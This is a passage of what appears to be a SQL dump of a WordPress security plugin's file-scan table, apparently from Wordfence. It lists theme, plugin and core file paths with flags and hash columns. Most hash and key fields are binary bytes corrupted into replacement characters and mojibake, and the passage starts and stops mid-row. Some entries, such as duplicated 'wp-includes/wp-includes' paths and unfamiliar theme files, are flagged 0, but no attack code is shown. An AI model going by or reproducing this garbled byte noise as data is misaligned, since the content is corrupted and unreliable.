��/\r���:�����0;>�_M3��w�','',0,'?'),('D0T����3�yW\"�','wp-includes/wp-includes/sodium_compat/src/Core/X25519.php',0,'pZ�����:!�ټ�','pZ�����:!�ټ�','3�l�@���o�-�3���S���Տ&�!��','',0,'?'),('D6m�e�r{pK�O�','wp-includes/locale.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ʋ\04�)o�ybU^�','�<�6n�\'�J�����_�� �S%��GVJ','',0,'?'),('D=n�vbP��._��','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-custom-colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��UWn:s�zk]U`��','@�%H2Z6#���y�����U4I�-��','',0,'?'),('DU���uZ�F���Z','wp-content/plugins/wp-cerber/assets/flags/no.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j.��#�0�P','2�!��u��6#=�%�ӹO���C4� \Z���rM�','',0,'?'),('DV/����A�ܣH-','wp-content/themes/storeone/inc/menu-walker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����G����H�',';�@�5�R5���.�(Ӏ���\0� 3�f�Ʌ�','',0,'?'),('D`H���0<\0�[NG','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-repeater-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z��#J�D���','H�z���Z�`!U?*�^^�����V�XNN!','',0,'?'),('D`��q&2��','wp-content/themes/twentytwentyone/assets/sass/06-components/single.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]H�9\0�$a�','c����f�����}�u���h���&����','',0,'?'),('Dh�;{6����n�L\'\0�','wp-content/themes/promote/inc/kirki/assets/js/controls/date.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��^e���)\n8Vx�','uఓ2*)��5���;8������[�·&�6�L','',0,'?'),('Dm��u�ϣ�!�I�5H�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pٽ��P��]G���','�|�� )��Y�M��,3���0���\Z*�9�p','',0,'?'),('Dm�u,o���f.�w�r','wp-content/themes/capacious/assets/css/owl.carousel.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&����\0����/�:=','x��4�b #���ni�[���0�BG�|�R�:4r','',0,'?'),('D|���jl���{\ry|','wp-content/themes/advance/inc/kirki/assets/scss/controls/number.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;s�xq��%_t','*Cz��I�;�R*��$��wE�pv���Qp�','',0,'?'),('D���u�\r��ɲ\Z','wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4Z?d����⢡','1XaRpLrIO%�%|\r��Vge\0�-b�^�n�=�','',0,'?'),('D����)ba�k��{��','wp-admin/includes/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�\np�Z�,���v�','k�_DRH{���\0�#�6Z�~�}����u��V�','',0,'?'),('D�C����E[=���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filescan-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z#/@�(C�`Њ�X��','�/k�#�R_���ElK�ʀ`J�T�*]X��|','',0,'?'),('D�<�$��8Z�o�','wp-includes/wp-includes/blocks/quote/block.json',0,'N`�^/��(��ǝ2�=','N`�^/��(��ǝ2�=','/{��Oe;gt@aݸG �/1Sv>��e̢kE','',0,'?'),('D�z�;�Yݠ��l','wp-content/themes/auberge/includes/welcome/class-welcome.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0�E1wp L','���Ks\ni����[g�8���DE@��_V[','',0,'?'),('Dչ�����$Oa����','wp-admin/css/colors/ectoplasm/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�S�S�_�Y�_3�f','ib��������itYz�Q.��F0��O^','',0,'?'),('D�E.Gྠb9k�8L=','wp-content/plugins/wp-cerber/assets/flags/hk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i.�@������C�_','�52Kx襹���*��Ȫ��b�B;b��*��\"�','',0,'?'),('Dݎ��nMn��rTE�=','wp-content/themes/newsmag/assets/images/header.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5����&�52p+L7','�hDP+���L4;���0�F�F+g�7[�����','',0,'?'),('D��B���,�s','wp-content/themes/fastblog/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�����f�\r�! t>','6���uV��Ȱ%H�ud���lԆFCԯQ','',0,'?'),('D�T[�-��U���','wp-content/plugins/wordfence/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','($h�c���1�h��','=zQ�o��5�?\0�d�_�\r���V5�M�j�N�?�','',0,'?'),('D��5\n\'�\\��~W��','wp-includes/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`��k�3wh��k�͔','G�>�F|59��~�q|\n&\0��R l�','',0,'?'),('D�%X��\0T\\7���I�','wp-content/plugins/wordfence/modules/login-security/css/admin.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�%v#)��ݩ5��!�','B��i�x�����u\n�1ͺ2��{�','',0,'?'),('D�^����c.&�Ж��','wp-content/themes/anima/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J����ЩTϩD\\','Np��v�ͨ���oˇ��p*�Pz�','',0,'?'),('E�B���#��_ ','wp-content/themes/auberge/library/controls/class-WM_Customizer_Multiselect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rQ��O�3-0����','�{�b�Z0B��\0���B`1s�qG�x�}^p','',0,'?'),('E�t�Iy���N,�','wp-content/themes/wp-barrister/library/images/icon-email.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�L������V\":;#','�ɒ;��i�-��ی�bF�xZ7��}|����','',0,'?'),('E]GK\0lh�-0','wp-content/themes/Kent/comments.php',0,'L��d\r���P{^�Pe�','L��d\r���P{^�Pe�','�Tm�\0�Jm0-�{�|e:��|�6d�q�jw','',0,'?'),('E�f�iL����&���','wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php',0,'*5���^gG�o<NN','*5���^gG�o<NN','5�\'4ϣ�j3Ò�NjX�CU�!�����]~','',0,'?'),('E ӊ�>�/���eR�','wp-content/themes/gambit/template-fullwidth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��ףï�vѓ�N��','���EY��WP=�.k�\rWE�g�7`L(j��@','',0,'?'),('E#���-v37�6�Ť','wp-content/plugins/wordfence/wordfence.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F(e����韲7\Z.�','c�eEjˉ�\n��#;{��gul��r�p','',0,'?'),('E4��fu\r#R:k!jgh','wp-includes/js/wp-list-revisions.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}�\Z�ۦ_��8K',']\r��o�8�Y�6��)ryW?�Y�����b�z(','',0,'?'),('E5�;����tR���$L�','wp-includes/js/dist/element.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�%L��ѹE!��','��rJ�L^>ui��Ob�1�DƖ�>��!E','',0,'?'),('EJ�TW����D�)����','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature-pre-5-7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����f�qX�����','kO[0�Xn@�ȇr02]��-����\n,���8','',0,'?'),('EK������U�1 N�','wp-content/themes/fastblog/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2���r����3�s','!p���͋?3^����8�X�����U\\��\'q*','',0,'?'),('Eh�������@aq��','wp-includes/session.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�NRM��<\\����>��','}����k+8M�U=<;��t����I*,�4#�','',0,'?'),('Ei&��@�iNo=��\Z�','wp-content/themes/wp-barrister/library/images/icon-ot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]�k]�a�Q1G#\0�Y','���1:���#n�[�>�)���x��}-��BL�','',0,'?'),('Et�\"��\r�v��ch','wp-content/themes/travel-stories/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W(�\'\r�e�(��I�','��vSH/`�^��|݉�~�ȯO� ���[���','',0,'?'),('E���c\\3͟Kpyq&e','wp-content/themes/vision-lite/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�D �=�h��<x','u3F�1jNK����2ҶVʗĞy�b�14�L','',0,'?'),('E��(�zRA1;eN�qD3','wp-content/plugins/wordfence/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��e��ª��\\�og','�� ��o���M�J#�A|�ߎ�(��;6R\n�','',0,'?'),('E�im�/��f\\��8+Z','wp-content/plugins/wp-cerber/assets/flags/gl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���8�+xO,�o*�}9','J\'�Ѫ��(�6����臚#��{�dp�I�','',0,'?'),('E�}�~��M��-�]�a','wp-admin/css/widgets.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xl�Y}���q�\r���7$','��w�?�Z�L\0�ì*8��L_���5��`��','',0,'?'),('E�n=>����.���;f','wp-includes/wp-includes/js/dist/data-controls.min.js',0,']���p���\r��sµ',']���p���\r��sµ','�ӝk?������?���d�<���vc','',0,'?'),('E�|Ѩ�J\n�_fB','wp-content/themes/advance/inc/images/layout1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�?�H�t�u�ò','��t5��cz^∄=�P�G�7�$Pc���','',0,'?'),('E��c�\"�i7��>�','wp-content/themes/hueman/option-tree/assets/images/layout/right-dual-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�0�l8= �@�H-��','����JBE���7�� S&A�ʁ)�\'\n����i','',0,'?'),('E�V��,�%��,SM=','wp-admin/ms-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P3�\n��7|L?MtA���','a����c�sc\Z���\"�V�L\\�њ�','',0,'?'),('E�أĒ=t\0���Ú','wp-content/themes/Endolf/FT/FT_scope.php',0,'㉃�q�B3v��u.��','㉃�q�B3v��u.��','�h��G+L�&\'AG-G2�n~�H�\rh���','',0,'?'),('E�B3A���-\r�&!�T','wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�o��y�벍cK�',':P��cc�z�\"�����Q�a���QZ�d','',0,'?'),('E�Dc�9�>�� ��v','wp-content/plugins/wp-cerber/nexus/cerber-nexus-slave.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h9�H��듦)�x��','pYq�e�\'I\n:�\0�y%G�C-|M�gf��','',0,'?'),('E�e&��0�\'�0��٣','wp-content/plugins/wp-cerber/assets/flags/ga.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`#�HG�)����4X�','�NvX���aa %�Q�U�SJX;M.G�j','',0,'?'),('E�!u]�N#=S�y(','wp-content/themes/Yegor/FT/license-html.php',0,'��� �,��ۓ��X��H','��� �,��ۓ��X��H','����Y��XjМ�������%,�]���&k��','',0,'?'),('E���G8�+�{øu�','wp-content/themes/fastblog/full-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�PU�Р�)hF��>�','��-o�Ʀ�@<�L�d���}�p�����j��','',0,'?'),('E�H��vYt���<\0 ','wp-includes/wp-includes/blocks/search/block.json',0,'�虚-�.�\Z��2 �','�虚-�.�\Z��2 �','O�ͯ�G�2�\n�ɣ~�V��\Z6��|x','',0,'?'),('E��<��I���頺�|','wp-content/themes/gambit/images/default-slider-image.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`\0Q�W��1Kq\n','�;\Z��1�L����&�L�k�Iss��x/ ','',0,'?'),('F�Hȝl�e��#�','wp-includes/js/tinymce/skins/wordpress/images/more-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l,��r�%�^x�%','���Y=�_�b��|ʧ&f,��<�������','',0,'?'),('Fq�����E؇��','wp-content/plugins/wp-cerber/assets/ui-stack.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N3�ߪ���(Q','�\"%cb�[$2��\Z��\rN�w`� �?&�L�\\','',0,'?'),('FR�Id�\\X�y��G','wp-content/themes/spidermag/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pC���n-��<�T*��','wכ�pE��\'�z�&V�Д���{Dݞ��G�a�w','',0,'?'),('F\r�x�w~�\rܱ��\n�','wp-includes/widgets/class-wp-widget-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}��z�Ys��]�','H:�wn����n8V��9�\'�tLYƭBq����','',0,'?'),('F1+\Z#�+d�{�w�{','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.D6�p�i�r`�fw�=','�2��KJ73��x�2�M2��&�+���L��L','',0,'?'),('F5\'�?��\0��?Fe_F','wp-includes/wp-includes/nav-menu.php',0,'(������%��ӯq','(������%��ӯq','?^��в�W�}T{5�3�m�T�:�锟��G','',0,'?'),('F=�n�|:�7*�NMp�','wp-content/themes/newsmag/inc/widgets/posts_column/class-widget-newsmag-posts_column.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(\r�E�pLG��Đ?','j���d\'߃�~]r���������qw�.t���','',0,'?'),('F@ v��h^)���Ӷ�','wp-includes/wp-includes/class-wp-widget-factory.php',0,'�ե�ᡵ���|��I� ','�ե�ᡵ���|��I� ','(H��e3a�Z]��t\\�����\'�d��p���','',0,'?'),('FCW.�3���\Z��U�','wp-includes/js/jquery/ui/checkboxradio.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˂��_���>��Klk','Ě�8�\nm��r+\"�?�~iLOVR~��C','',0,'?'),('FF�v��V;v�8/�\r��','wp-includes/SimplePie/Misc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I��\Z��}[�X�rb^','U�l?l�N�v6�0\'�,��(N��\0�&��','',0,'?'),('FH���30m�:��s��','wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xR� �Y�X���ݤ���','m���\Zc���ĭ��]���[��^�P��w','',0,'?'),('Fg��5�F\n�+�93','wp-content/plugins/wp-cerber/cerber-ds.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CcBP�\"��~�',']����9�e0�`����T�]�Q�}`�a�','',0,'?'),('Fo��ܿ,���폨','wp-content/themes/sg-window/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�J��\\Q����C','�M��]�-\'ݟ{ ���:��K�� B�O�','',0,'?'),('Fq��#�d���!RGL�','wp-content/themes/weblog/assets/library/owl-carousel/owl.carousel.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����DF�H�<�P<E�','��p�?��I�Ü$�d�Б>d���Ί1�','',0,'?'),('F|����w�ZQ,O��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6���?�\n� :�{Q%','���Z�IK/I��w¥�Ovy�E�Bi\\$G�&','',0,'?'),('F}3�(�̬�OI ��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j;�ʻ��#��qb','m7w�W���&em�C������1��a�c =27','',0,'?'),('F���Ժ6��ފ\0�Q','wp-content/plugins/wp-cerber/assets/flags/by.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Fƞ�01���','R8�;��k�m��l�X��V�6�V�\"��ď','',0,'?'),('F�<�g�b�y���l\r','wp-content/themes/wp-barrister/library/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�%}y�-��H�~U(','�E�\'�9Um�k����ML��~_Kg�jE��','',0,'?'),('F�j5\"g���ȿ�Z��','wp-includes/wp-includes/theme-compat/embed-404.php',0,'7�[R+S��A-\Za*e','7�[R+S��A-\Za*e','�}�pN�\0�K��6�%),�o��`�)�1\08','',0,'?'),('F�\\�C?�Z���','wp-includes/css/customize-preview-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��މ����ګd��3','~�\'��[z�{��:����LĀN7A�� ','',0,'?'),('F�>���bû��6���','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png',0,'R���Z�?f.��8�� ','R���Z�?f.��8�� ','��.c%�c�*G~�բ>�Yd���:�7�j','',0,'?'),('F��Ã\\�O�fg�','wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1����v��R','N3G�\'�`��+R>�P]E�γg/�b?���UX','',0,'?'),('F�\'�B�/�4{J�{w','wp-admin/js/edit-comments.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','삺�m��\n\'��P�','^���;(�R�@ݪ:��:_9���*j���','',0,'?'),('F�\n�����#�P�','wp-includes/wp-includes/class-snoopy.php',0,'�[�PQ��I��P4!��','�[�PQ��I��P4!��','�+� ��uzR�W QW�|��5��� j[;U|�','',0,'?'),('F�:{c\0��$Ϯ�6�','wp-content/themes/promote/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���E�v�VD�9~','B��;(�L�\'�Q�ܴ8��\r<f,�������\ZZa','',0,'?'),('F���?�C;$��H\r\r','wp-admin/css/color-picker.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z=�����EG�> �1\Z<','t-�]Lb8�n�d�\\pm^�����i[�c�\Z��','',0,'?'),('F�V����Od%�|u�','wp-content/plugins/wordfence/images/wordfence-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"� +h\"Fb��','',0,'?'),('G�?�cm�\nulf,1','wp-includes/wp-includes/css/dist/block-editor/style-rtl.min.css',0,'W.�M�л�=@�D�Yw#','W.�M�л�=@�D�Yw#','�1.�f���\"|�R�;x�7B�6����3a���','',0,'?'),('G�JtC��S����','wp-content/themes/hueman/assets/front/img/demo/5-320x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����ڷ�C�|�l�','�K�?�?�jW!�(��>.�\'`��f\n�ɔ��','',0,'?'),('G�|�xG��$�3V','wp-includes/wp-includes/css/dist/editor/style.css',0,'k����`�\0d���','k����`�\0d���','�2��*Pj%R4{?��M�rH�:�����b�~','',0,'?'),('G�`(X�� ��','wp-includes/wp-includes/js/utils.js',0,'���2���![pNI�5','���2���![pNI�5','iII4�*��{FZan�Ǡ�)J,T�&�g��','',0,'?'),('G Xe�x��w0\\�o8','wp-includes/Requests/Response/Headers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�ÂҶ�A-��>c�`','�E�\n�F � ���M���%{��a���`,�','',0,'?'),('G!��:�[��H������','wp-content/themes/skt-pathway/images/arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �O\Zs���b�~���','Qġ�c�Ԥ�n�G�1ja.\rO�ޓ�q%-v��','',0,'?'),('G6U�2\01R������J','wp-admin/js/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R��s�p���p1��','Uuu� jK��>}��ʊ$|@.8K3����','',0,'?'),('G9\Z��CA���RLr�W�','wp-content/themes/capacious/inc/customizer/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�XP��\r�N�/��>u�','X&�E}s�!�Ad��x��^w���×1��,~','',0,'?'),('G;)[}tڞ`8���C�','wp-includes/wp-includes/class-wp-user.php',0,'>��b�Zd�� ��','>��b�Zd�� ��','���mA�QW,�?�;��w�FT\\>��','',0,'?'),('GI�9�\rxz>��G~H/F','wp-content/themes/fastblog/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o5��\'x\ZJ�x�C��v','����B�M�=��;=�����O���p�W','',0,'?'),('Gg*�v�#1�á�ͷ�Q','wp-content/themes/maxbusiness/css/swiper.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�zu�2�wZM-��','�nXM��);]�+0�\'���\r\'���0=\"�>u','',0,'?'),('Gm��:�MľV��LЉ','wp-includes/js/tinymce/utils/editable_selects.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��q2��I\'�J�9�E','�v��Gjs��f�� e�d�&�g��+���','',0,'?'),('Gp�ؠ����Z�V�P�','wp-content/themes/sg-window/inc/customize-colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2g��y�(�I,��G��','�\raf�����M2M-ƿ?�R:Q����W','',0,'?'),('Gq�b٫ ������s�','wp-content/plugins/wp-cerber/assets/bn2ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���8�^ְ��sO','g���c}�;\'�B��9�ق�\Z4CW��JR�%��','',0,'?'),('Gu�������ʭ�','wp-includes/class-wp-meta-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��C��̚{\"Hp�=','��R�����l�� �n���\\��h����ݢ','',0,'?'),('Gu5���aԯ��','wp-includes/rest-api/search/class-wp-rest-post-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}*�yY��ը�F�','1��SD��v�jk3�\0�G�<�\'|��!���','',0,'?'),('Gu�^�/1��ՁS�7','wp-includes/atomlib.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2*rMb3ы�y��','��:��8��px� ��������}��)�!�','',0,'?'),('G�9q���=ʥ[3?a�','wp-admin/images/bubble_bg-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϭq�j��\n�X�<','n��%4��L���6{�/Т[�Ĭ?XW_A.r','',0,'?'),('G���Y���lE{�','wp-includes/wp-includes/js/dist/escape-html.js',0,'�E����e����c�k�','�E����e����c�k�','8:���\Z�U$D_�t���8(f4�}%Uә�','',0,'?'),('G�7\Z��I&:�x','wp-admin/edit-form-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A˼ܗ\ri^o4~�','��Q9sY��&a��*�}J�x�1��u����','',0,'?'),('G�~�� ,�_�1�)z0','wp-content/themes/storeone/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N����Y�)�U','&��Þ�D(�������T�+/�C�u��� W','',0,'?'),('G�d���IέיDj','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A���f�R���emV�k','����I�C�O�Y�ʋp �0Ox�1{t<�','',0,'?'),('G����7r:$,�M!','wp-content/themes/Endolf/inc/promoted.php',0,'���:���U','���:���U','�I�Y���-ez�дJFN���SA+��cf�K','',0,'?'),('G�?�yİ���~r&','wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s���#�Rw�ij\n��','&T�)\'4:���\"v�t*���\n�����J\ZR�','',0,'?'),('G��N��$�Ckt�U]','wp-content/themes/hueman/assets/front/img/sidebar/s-left-dual-s2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ƽ��M_��p\0\\Gn','ycS�� �$?��!3�Woc�r��$���','',0,'?'),('G�q׃����B�:','wp-includes/wp-includes/images/wpicons-2x.png',0,'��n�V�o�$��Of~7','��n�V�o�$��Of~7','�]کA=�ђ�%�q�%aM�����B�U�p','',0,'?'),('H�\0 �� N�HB]I','wp-content/themes/twentytwentyone/template-parts/content/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�8�{N����W�L','�>��Q�#*������^�_(VY&I�@H�҇[�','',0,'?'),('HX�Oq��U���x<','wp-content/themes/weblog/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��ʅ�w����(v�X�','\\�~�_�R>4�` 㧿��0,�5�}*3ZU�','',0,'?'),('H\rz��QМ�r�H��','wp-content/themes/wp-barrister/sidebar-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%��G;�n��t','/\0����u�ZA��81?�)��2K����_���','',0,'?'),('H�Y�fUH�u�pd','wp-includes/Requests/Exception/HTTP/400.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�n���VJ�R�x�5��','�d�>���� �i�H����b$�&�n���6�p\Z','',0,'?'),('H\0��k���K��\n','wp-content/themes/spidermag/spidermag/customwidget/widget-banner-carousel-fullwidth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9-H*MF�䟛�E!�','f��\"w��s��O�9��Y�Μ��3T#\'Ѕ�','',0,'?'),('H+�E~�}�1Q���','wp-includes/js/wp-util.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�H��OZ\'�]1�T','���;@�O0,�KG#�&h0�RҘ�6�0���T','',0,'?'),('HA���f�,���$F-�','wp-admin/css/customize-nav-menus-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{&��Þ���>��','�i$�z:1$s+»����̔��\Z��!o��','',0,'?'),('HD�Q���ٻT���l�','wp-content/themes/showcase-lite/images/slides/slider.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c� ^����*�Ζ','�\0|���9�n��P���CV�K�JI���','',0,'?'),('HF���y�9��3��','wp-content/themes/spidermag/assets/images/735x450.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',q�z�? ��z!�','�ڙ���K�R����hk�:{&�R��)^��','',0,'?'),('HF�x�~)U_A�vd��','wp-includes/wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css',0,'�b�j��u9)�\n6�5','�b�j��u9)�\n6�5','gg(($C���(rw�H\n�O���D!\rl��a�','',0,'?'),('HGh\'�x�R���~\n','wp-admin/js/customize-nav-menus.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�E�{�F�\n���','qC�&�+�N<[�l\\{V�h�R�)��Ž2�','',0,'?'),('HKC�[���*GD�','wp-includes/wp-includes/js/wp-lists.js',0,'�M4���KYs:��ȫ�','�M4���KYs:��ȫ�','����Z-3w�Eї\rqK]��3�]��.X','',0,'?'),('H`�\\� �r���Y�C','wp-admin/includes/class-theme-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�ȣ�\0���O�)l+','u��S����u�����iD�p�,\\��C�M5�','',0,'?'),('He�p��?�뢁\"wG�','wp-content/themes/newsmag/inc/customizer/epsilon-framework/control-epsilon-toggle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jF@(�e�`P�','���w:�� ��0�Fڙ��2���s��','',0,'?'),('Hg�a����;yż�','wp-content/themes/event/pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1\nk��d � �(�b�','\0[{���u����W4s\Z�=�y����I�r���','',0,'?'),('Hmϡ\n��\0M�}0\"ؒ�','wp-content/themes/twentytwentyone/template-parts/header/excerpt-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�L�AZ;ߪ��u','�� ��w�M���ӳY�\r�%��%�\'�aO�A&�x','',0,'?'),('Hy��5�����}��D','wp-content/themes/promote/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','㩇�ؼ<����f!�','؏�b��� b���ŋ��׆��ި����|�q','',0,'?'),('H�s1���$7�$','wp-content/themes/sg-window/img/icons/small/friendster.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w�EQ?}��(O���','�g��jJ��W�kljǶ��w�`�/jA','',0,'?'),('H��F����\r�Tio��','wp-content/themes/storeone/inc/kirki-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'흗/�,�+U�nW','���)�ǹ��w˾�:z9{/R��z�X\Z���','',0,'?'),('H�ংݭ���A��/','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-select2-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�c���\0�p�s�','>�q{(�+fޙ`�=��a@��3bzܥа�l','',0,'?'),('H�C�|�[5�`Z(','wp-content/themes/auberge/assets/css/custom.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����#�u�B�','�\"�!?gg��oH���l�(��Q}� 